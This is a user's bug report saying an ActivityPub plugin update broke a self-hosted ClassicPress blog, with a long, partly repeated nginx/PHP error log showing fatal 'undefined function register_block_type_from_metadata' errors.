/srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-cron.php(34): require_once('/srv/atarifrosc...') #9 {main} thrown in /srv/atarifrosch-blo" while reading response header from upstream, client: 2a01:4f8:150:81e4::2, server: blog.atari-frosch.de, request: "POST /wp-cron.php?doing_wp_cron=1694617419.0569748878479003906250 HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de", referrer: "https://blog.atari-frosch.de/wp-cron.php?doing_wp_cron=1694617419.0569748878479003906250" 2023/09/13 17:03:39 [error] 17262#17262: *695100 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 162.19.87.99, server: blog.atari-frosch.de, request: "GET / HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:03:39 [error] 17262#17262: *695106 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-cron.php(34): require_once('/srv/atarifrosc...') #9 {main} thrown in /srv/atarifrosch-blo" while reading response header from upstream, client: 2a01:4f8:150:81e4::2, server: blog.atari-frosch.de, request: "POST /wp-cron.php?doing_wp_cron=1694617419.0634241104125976562500 HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de", referrer: "https://blog.atari-frosch.de/wp-cron.php?doing_wp_cron=1694617419.0634241104125976562500" 2023/09/13 17:03:39 [error] 17262#17262: *695101 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 35.159.31.152, server: blog.atari-frosch.de, request: "GET / HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:03:41 [error] 17262#17262: *695115 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 116.203.72.98, server: blog.atari-frosch.de, request: "GET / HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:03:43 [error] 17262#17262: *695121 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 152.228.220.143, server: blog.atari-frosch.de, request: "GET /tag/terrorismus/feed/ HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:04:50 [error] 17262#17262: *695134 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-cron.php(34): require_once('/srv/atarifrosc...') #9 {main} thrown in /srv/atarifrosch-blo" while reading response header from upstream, client: 2a01:4f8:150:81e4::2, server: blog.atari-frosch.de, request: "POST /wp-cron.php?doing_wp_cron=1694617490.5343809127807617187500 HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de", referrer: "https://blog.atari-frosch.de/wp-cron.php?doing_wp_cron=1694617490.5343809127807617187500" 2023/09/13 17:04:50 [error] 17262#17262: *695132 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 92.247.181.9, server: blog.atari-frosch.de, request: "GET /feed/ HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de", referrer: "https://blog.atari-frosch.de/" 2023/09/13 17:04:50 [error] 17262#17262: *695137 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_bloc ks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 152.228.220.143, server: blog. atari-frosch.de, request: "GET /2011/05/02/merkel-lobt-obama-fuer-einen-mord/feed/ HTTP/1.1", upstream: "fastcgi://unix: /run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:05:10 [error] 17262#17262: *695141 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 195.62.45.130, server: blog.atari-frosch.de, request: "GET /feed/ HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:05:24 [error] 17262#17262: *695150 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 195.62.45.130, server: blog.atari-frosch.de, request: "GET /feed/ HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:05:42 [error] 17262#17262: *695156 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 185.220.102.241, server: blog.atari-frosch.de, request: "GET / HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" Before the upgrade the plugin didn't work. I could never find my instance in the Fediverse.
True
Plugin breaks ClassicPress - Yesterday (2023-09-13) I upgraded the plugin in my ClassicPress installation on blog.atari-frosch.de, and directly afterwards the blog only delivered empty pages. I had to delete the plugin on the shell (I'm hosting the stuff myself) so that the blog could start working correctly again. System: Devuan GNU/Linux 4 Chimaera Kernel: Linux seelilie 5.10.0-25-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64 GNU/Linux Webserver: nginx-full_1.18.0-6.1+deb11u3_all.deb PHP: PHP 7.4.33 with php7.4-fpm_7.4.33-1+deb11u3_amd64.deb This is what the error.log said after the update (2a01:4f8:150:81e4::2 is the server's IPv6 address): 2023/09/13 17:02:24 [error] 17262#17262: *694892 FastCGI sent in stderr: "Primary script unknown" while reading response header from upstream, client: 178.63.18.4, server: blog.atari-frosch.de, request: "GET /status.php HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:02:37 [error] 17262#17262: *694964 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-cron.php(34): require_once('/srv/atarifrosc...') #9 {main} thrown in /srv/atarifrosch-blo" while reading response header from upstream, client: 2a01:4f8:150:81e4::2, server: blog.atari-frosch.de, request: "POST /wp-cron.php?doing_wp_cron=1694617357.0145969390869140625000 HTTP/1.1", upstream: "fas tcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de", referrer: "https://blog.atari-frosch.de/wp-cron.php?doing_wp_cron=1694617357.0145969390869140625000" 2023/09/13 17:02:37 [error] 17262#17262: *694962 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-admin/admin-ajax.php(22): require_once('/srv/atarifrosc...') #9 {main} thrown in /srv/ata" while reading response header from upstream, client: 44.235.211.232, server: blog.atari-frosch.de, request: "GET /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=0&scanMode=quick&cronKey=92986d278e1731d7d9c6382dadc82053&signature=d074f3ceead03583d4a5ea1e2ecc2f70375108a93e089b1b37a2b00ce487fde8&remote=1 HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:02:38 [error] 17262#17262: *694967 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-admin/admin-ajax.php(22): require_once('/srv/atarifrosc...') #9 {main} thrown in /srv/ata" while reading response header from upstream, client: 44.235.211.232, server: blog.atari-frosch.de, request: "GET /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=0&scanMode=quick&cronKey=92986d278e1731d7d9c6382dadc82053&signature=d074f3ceead03583d4a5ea1e2ecc2f70375108a93e089b1b37a2b00ce487fde8&remote=1 HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:02:42 [error] 17262#17262: *694935 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-admin/admin-ajax.php(22): require_once('/srv/atarifrosc...') #9 {main} thrown in /srv/ata" while reading response header from upstream, client: 109.90.207.33, server: blog.atari-frosch.de, request: "POST /wp-admin/admin-ajax.php HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.ata ri-frosch.de", referrer: "https://blog.atari-frosch.de/wp-admin/plugins.php" 2023/09/13 17:02:54 [error] 17262#17262: *695008 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-admin/admin.php(34): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/wp-admin/p" while reading response header from upstream, client: 109.90.207.33, server: blog.atari-frosch.de, request: "GET /wp-admin/plugins.php HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de", referrer: "https://blog.atari-frosch.de/wp-admin/plugins.php" 2023/09/13 17:03:14 [error] 17262#17262: *695060 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 109.90.207.33, server: blog.atari-frosch.de, request: "GET / HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:03:39 [error] 17262#17262: *695104 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-cron.php(34): require_once('/srv/atarifrosc...') #9 {main} thrown in /srv/atarifrosch-blo" while reading response header from upstream, client: 2a01:4f8:150:81e4::2, server: blog.atari-frosch.de, request: "POST /wp-cron.php?doing_wp_cron=1694617419.0569748878479003906250 HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de", referrer: "https://blog.atari-frosch.de/wp-cron.php?doing_wp_cron=1694617419.0569748878479003906250" 2023/09/13 17:03:39 [error] 17262#17262: *695100 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-blog-header.php(13): require_once('/srv/atarifrosc...') #9 /srv/atarifrosch-blog/index.php(" while reading response header from upstream, client: 162.19.87.99, server: blog.atari-frosch.de, request: "GET / HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "blog.atari-frosch.de" 2023/09/13 17:03:39 [error] 17262#17262: *695106 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function register_block_type_from_metadata() in /srv/atarifrosch-blog/wp-content/plugins/activitypub/ includes/class-blocks.php:32 Stack trace: #0 /srv/atarifrosch-blog/wp-content/plugins/activitypub/includes/class-blocks.php(10): Activitypub\Blocks::register_blocks() #1 /srv/atarifrosch-blog/wp-content/plugins/activitypub/activitypub.php(55): Activitypub\Blocks::init() #2 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(287): Activitypub\init() #3 /srv/atarifrosch-blog/wp-includes/class-wp-hook.php(311): WP_Hook->apply_filters() #4 /srv/atarifrosch-blog/wp-includes/plugin.php(458): WP_Hook->do_action() #5 /srv/atarifrosch-blog/wp-settings.php(453): do_action() #6 /srv/atarifrosch-blog/wp-config.php(98): require_once('/srv/atarifrosc...') #7 /srv/atarifrosch-blog/wp-load.php(37): require_once('/srv/atarifrosc...') #8 /srv/atarifrosch-blog/wp-cron.php(34): require_once('/srv/atarifrosc...') #9 {main} thrown in /srv/atarifrosch-blo" while reading response header from upstream, client: 2a01:4f8:150:81e4::2, server: blog.atari-frosch.de, request: "POST /wp-cron.php?doing_wp_cron=1694617419.0634241104125976562500 